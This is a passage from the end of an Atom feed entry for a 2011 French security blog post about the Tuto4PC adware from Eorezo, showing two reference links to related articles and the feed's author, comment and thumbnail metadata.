&lt;a href="http://www.cyroul.com/societe-digitale/la-societe-tuto4pc-cramee-en-6-etapes/"&gt;http://www.cyroul.com/societe-digitale/la-societe-tuto4pc-cramee-en-6-etapes/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://secufd.frogz.fr/post/2011/07/17/SebSauvage-vs-Tuto4PC.aspx"&gt;http://secufd.frogz.fr/post/2011/07/17/SebSauvage-vs-Tuto4PC.aspx &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Open your mind. &lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/m7eFyRAJ5oA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/1664052489803884239/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/07/adware-tuto4pc-le-nouvel-adware-deorezo.html#comment-form" title="2 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/1664052489803884239?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/1664052489803884239?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/m7eFyRAJ5oA/adware-tuto4pc-le-nouvel-adware-deorezo.html" title="[Adware] Tuto4PC / PCTuto -- Le nouvel adware d'Eorezo" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-JPZQy7T2XU4/ToqenFqxaUI/AAAAAAAAAEE/PcOgZvghFIg/s72-c/Capture.PNG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/07/adware-tuto4pc-le-nouvel-adware-deorezo.html</feedburner:origLink></entry></feed>
